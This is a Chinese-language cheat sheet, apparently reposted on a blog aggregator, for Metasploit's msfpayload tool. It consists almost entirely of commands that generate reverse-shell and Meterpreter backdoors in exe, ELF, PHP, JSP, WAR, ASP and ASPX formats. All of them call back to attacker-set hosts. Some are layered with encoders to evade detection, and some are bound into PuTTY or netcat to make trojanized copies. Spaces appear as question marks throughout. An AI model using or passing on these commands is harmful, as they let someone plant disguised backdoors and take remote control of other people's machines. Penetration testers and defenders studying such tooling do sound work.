msf payload php,Metasploit(四)--Msfpayload命令
msfpayload即將在2015年6月18日棄用,用msfvenmon替代
msfpayload?-h
msfpayload的幫助信息。
msfpayload?-l?|?grep?windows
msfpayload?-l?|?grep?linux
msfpayload?-l?|?grep?andriod
列出某個平臺的pyloads
msfpayload?windows/meterpreter/bind_tcp?S
查看需要設置參數
msfpayload?windows/meterpreter/bind_tcp?O
列出所有windows/meterpreter/bind_tcp下可用的***載荷的配置項(任何***載荷都是可用配置的)。
msfpayload?windows/meterpreter/reverse_tcp?LHOST=IP?LPORT=PORT?X?>?payload.exe
創建一個metasploit的reverse_tcp***載荷,回連到LHOSTip的LPORT,將其保存為名為payload.exe的windows下可執行程序。
msfpayload?windows/meterpreter/reverse_tcp?LHOST=IP?LPORT=PORT?R?>?payload.raw
創建一個metasploit的reverse_tcp***載荷,回連到LHOSTip的LPORT,將其保存為名payload.raw,該文件后面的msffencode中使用。
msfpayload?windows/meterpreter/reverse_tcp?LPORT=PORT?C?>?payload.c
創建一個metasploit的reverse_tcp***載荷,導出C格式的shellcode。
msfpayload?windows/meterpreter/reverse_tcp?LPORT=PORT?J?>?payload.java
創建一個metasploit的reverse_tcp***載荷,導出成以%u編碼方式的javaScript語言字符串。
msfpayload與可執行文件幫頂,如netcat
root@bt:~#?msfpayload?linux/x86/shell_reverse_tcp?EXITFUNC=thread?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-a?x86?-e?x86/alpha_mixed?-k?-x?/bin/netcat?-t?elf?-o?nc
msfpayload生成linux backdooroot@bt:~#?msfpayload?linux/x86/shell_reverse_tcp?LHOST=192.168.7.102?LPORT=5555?X?>?linux2
msfpayload生成exe backdoorroot@bt:~#msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.1.1.1?LPORT=5555?R?|?msfencode?-t?exe?-c?5?>?/root/Desktop/door.exe
root@bt:~#msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.1.1.1?LPORT=5555?R?|?msfencode?-t?exe?-c?5?-k?-x?/root/putty.exe?-o?/root/Desktop/puttydoor.exe
root@bt:~#msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-e?x86/shikata_ga_nai?-t?raw?-a?x86?-b?'\x00\x0a\x0d'?-c?10?X?>?shell.bin
root@bt:~#msfpayload?windows/shell/reverse_tcp??LHOST=10.0.0.1?LPORT=4443?EXITFUNC=thread?R?|??msfencode?-e?x86/shikata_ga_nai?-c?2?-t?raw?|?msfencode?-e?x86/jmp_call_additive?-c?2?-t?raw?|?msfencode?-e?x86/call4_dword_xor??-c?2?-t?raw?|?msfencode?-e?x86/jmp_call_additive?-c?2?-t?raw?|?msfencode?-e?x86/call4_dword_xor??-c?2?-t?exe?-o?door.exe
msfpayload生成jsp backdooroot@bt:~#?msfpayload?java/jsp_shell_reverse_tcp?LHOST=10.1.1.1?LPORT=5555?R?>?door.jsp
msfpayload生成war backdoo
root@bt:~#?msfpayload?linux/x86/shell_reverse_tcp?LHOST=10.0.0.1?LPORT=5555?W?>?door.war
msfpayload生成php backdoor
root@bt:~#?msfpayload?php/meterpreter/reverse_tcp?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-e?php/base64?-t?raw?-o?base64php.php
msfpayload生成asp backdoorroot@bt:~#?msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-e?x86/shikata_ga_nai?-a?x86??-t?asp?-o?door2.asp
msfpayload生成aspx backdoor
root@bt:~#?msfpayload?windows/meterpreter/reverse_tcp?LHOST=10.0.0.1?LPORT=5555?R?|?msfencode?-e?x86/shikata_ga_nai?-a?x86??-t?aspx?-o?door.aspx
目標是內網時,常用的payload選著如:root@bt:~#?msfpayload?windows/meterpreter/reverse_tcp_allports?LHOST=192.168.1.6?R?|?msfencode?-e?x86/shikata_ga_nai?-c?3?-t?exe?-o?allports.exe
root@bt:~#?msfpayload?windows/meterpreter/reverse_http?LHOST=192.168.1.6?R?|?msfencode?-e?x86/shikata_ga_nai?-c?3?-t?exe?-o?httpports.exe
總結
以上是生活随笔為你收集整理的msf payload php,Metasploit(四)--Msfpayload命令的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: php大马源码 手机网页,php大马源码
- 下一篇: 内调祛斑最好的中药有哪些